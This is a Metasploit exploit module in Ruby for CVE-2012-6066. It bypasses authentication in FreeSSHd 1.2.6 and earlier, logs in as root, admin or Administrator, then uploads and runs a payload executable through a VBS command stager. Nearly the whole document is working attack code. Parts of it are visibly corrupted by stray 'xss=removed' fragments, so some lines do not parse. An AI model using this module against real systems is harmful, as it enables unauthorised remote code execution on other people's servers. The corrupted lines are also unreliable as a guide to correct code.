CVE-2012-6066

  1. require 'msf/core'
  2. require 'tempfile'
  3. class Metasploit3 < Msf xss=removed initialize(info={})> "Freesshd Authentication Bypass",
  4.             'Description'    => %q{
  5.                     This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass
  6.                 authentication. You just need the username (which defaults to root). The exploit
  7.                 has been tested with both password and public key authentication.
  8.             },
  9.             'License'        => MSF_LICENSE,
  10.             'Author'         =>
  11.                 [
  12.                     'Aris', # Vulnerability discovery and Exploit
  13.                     'kcope', # 2012 Exploit
  14.                     'Daniele Martini <cyrax>' # Metasploit module
  15.                 ],
  16.             'References'     =>
  17.                 [
  18.                     [ 'CVE', '2012-6066' ],
  19.                     [ 'OSVDB', '88006' ],
  20.                     [ 'BID', '56785' ],
  21.                     [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html' ],
  22.                     [ 'URL', 'http://seclists.org/fulldisclosure/2010/Aug/132' ]
  23.                 ],
  24.             'Platform'       => 'win',
  25.             'Privileged'     => true,
  26.             'DisclosureDate' => "Aug 11 2010",
  27.             'Targets' =>
  28.                 [
  29.                     [ 'Freesshd <= 1.2.6 / Windows (Universal)', {} ]
  30.                 ],
  31.             'DefaultTarget' => 0
  32.         ))
  33.  
  34.         register_options(
  35.             [
  36.                 OptInt.new('RPORT', [false, 'The target port', 22]),
  37.                 OptString.new('USERNAMES',[true,'Space Separate list of usernames to try for ssh authentication','root admin Administrator'])
  38.             ], self.class)
  39.     end
  40.  
    # Pull in the net-ssh gem lazily, at run time.
    #
    # net-ssh is not assumed to be installed alongside the framework, so the
    # LoadError is turned into a boolean and reported to the operator by
    # #exploit instead of being raised from here.
    #
    # @return [Boolean] true when +require 'net/ssh'+ succeeded, false otherwise
    def load_netssh
        require 'net/ssh'
        true
    rescue LoadError
        false
    end
  49.  
    # Fingerprint the target from its SSH greeting, without authenticating.
    #
    # Reads a single chunk of the server banner and looks for the WeOnlyDo
    # (wodSSH) identification string. The second whitespace-separated field of
    # the greeting is compared as the library version: 2.1.3 and 2.0.6 map to
    # Vulnerable, any other WeOnlyDo greeting to Appears, everything else to
    # Safe. Note that the version tested here is the wodSSH library version in
    # the banner, not the FreeSSHd release quoted in the module description,
    # and that the dots in both patterns are unescaped (they match any byte).
    #
    # @return [Exploit::CheckCode] Vulnerable, Appears or Safe
    def check
        connect
        greeting = sock.recv(30)
        disconnect

        return Exploit::CheckCode::Safe unless greeting =~ /SSH-2.0-WeOnlyDo/

        library_version = greeting.split(" ")[1]
        if library_version =~ /(2.1.3|2.0.6)/
            Exploit::CheckCode::Vulnerable
        else
            Exploit::CheckCode::Appears
        end
    end
  61.  
  62.  
  63.     def upload_payload(connection)
  64.         exe = generate_payload_exe
  65.         filename = rand_text_alpha(8) + ".exe"
  66.         cmdstager = Rex::Exploitation::CmdStagerVBS.new(exe)
  67.         opts = {
  68.             :linemax => 1700,
  69.             :decoder => File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64"),
  70.         }
  71.  
  72.         cmds = cmdstager.generate(opts)
  73.  
  74.         if (cmds.nil? or cmds.length < 1 xss=removed pass=rand_text_alpha(8) options={ xss=removed> pass,
  75.             :port     => datastore['RPORT'],
  76.             :timeout  => 1,
  77.             :proxies  => datastore['Proxies'],
  78.             :key_data => OpenSSL::PKey::RSA.new(2048).to_pem
  79.         }
  80.         return options
  81.     end
  82.  
    # Try one username against the target and hand back a usable SSH session.
    #
    # Builds the transport, performs a single authentication exchange with the
    # password carried in +options+, then opens the connection layer and runs
    # a harmless echo command to confirm the channel actually works.
    #
    # @param username [String] login name to try; also stored in options[:username]
    # @param options [Hash] net-ssh options as built by setup_ssh_options
    #   (mutated in place: :username is overwritten on every call)
    # @return [Net::SSH::Connection::Session, nil] the open session when the
    #   probe command completed within 10 seconds, nil when the probe raised a
    #   RuntimeError or timed out
    def do_login(username,options)
        print_status("Trying username "+username)
        options[:username]=username

        transport = Net::SSH::Transport::Session.new(datastore['RHOST'], options)
        auth = Net::SSH::Authentication::Session.new(transport, options)
        # The outcome of the authentication exchange is not inspected; the
        # module opens the connection layer regardless of the server's answer.
        auth.authenticate("ssh-connection", username, options[:password])
        connection = Net::SSH::Connection::Session.new(transport, options)
        begin
            # Probe the channel with a no-op command. A server that enforces
            # its authentication state is expected to refuse the session here,
            # which surfaces as the RuntimeError branch below — confirm against
            # net-ssh's error classes. This echo is also the first command a
            # host-side log would record for this attempt.
            Timeout.timeout(10) do
                connection.exec!('cmd.exe /c echo')
            end
        rescue  RuntimeError
            return nil
        rescue  Timeout::Error
            print_status("Timeout")
            return nil
        end
        return connection
    end
  103.  
    # Module entry point.
    #
    # Ensures net-ssh is available, then walks the space-separated USERNAMES
    # list and stops at the first name for which do_login returns a session.
    # With a session in hand it uploads the payload and starts the handler;
    # otherwise it returns without further output.
    #
    # Prints an error and returns early when net/ssh cannot be loaded.
    def exploit
        unless load_netssh
            print_error("You don't have net/ssh installed.  Please run gem install net-ssh")
            return
        end

        ssh_options = setup_ssh_options

        # Lazy so that do_login is only invoked until the first session appears;
        # the same options hash is reused (do_login rewrites :username each time).
        candidates = datastore['USERNAMES'].split(' ')
        session = candidates.lazy.map { |name| do_login(name, ssh_options) }.find(&:itself)

        return unless session

        print_status("Uploading payload. (This step can take up to 5 minutes. But if you are here, it will probably work. Have faith.)")
        upload_payload(session)
        handler
    end
  130. end
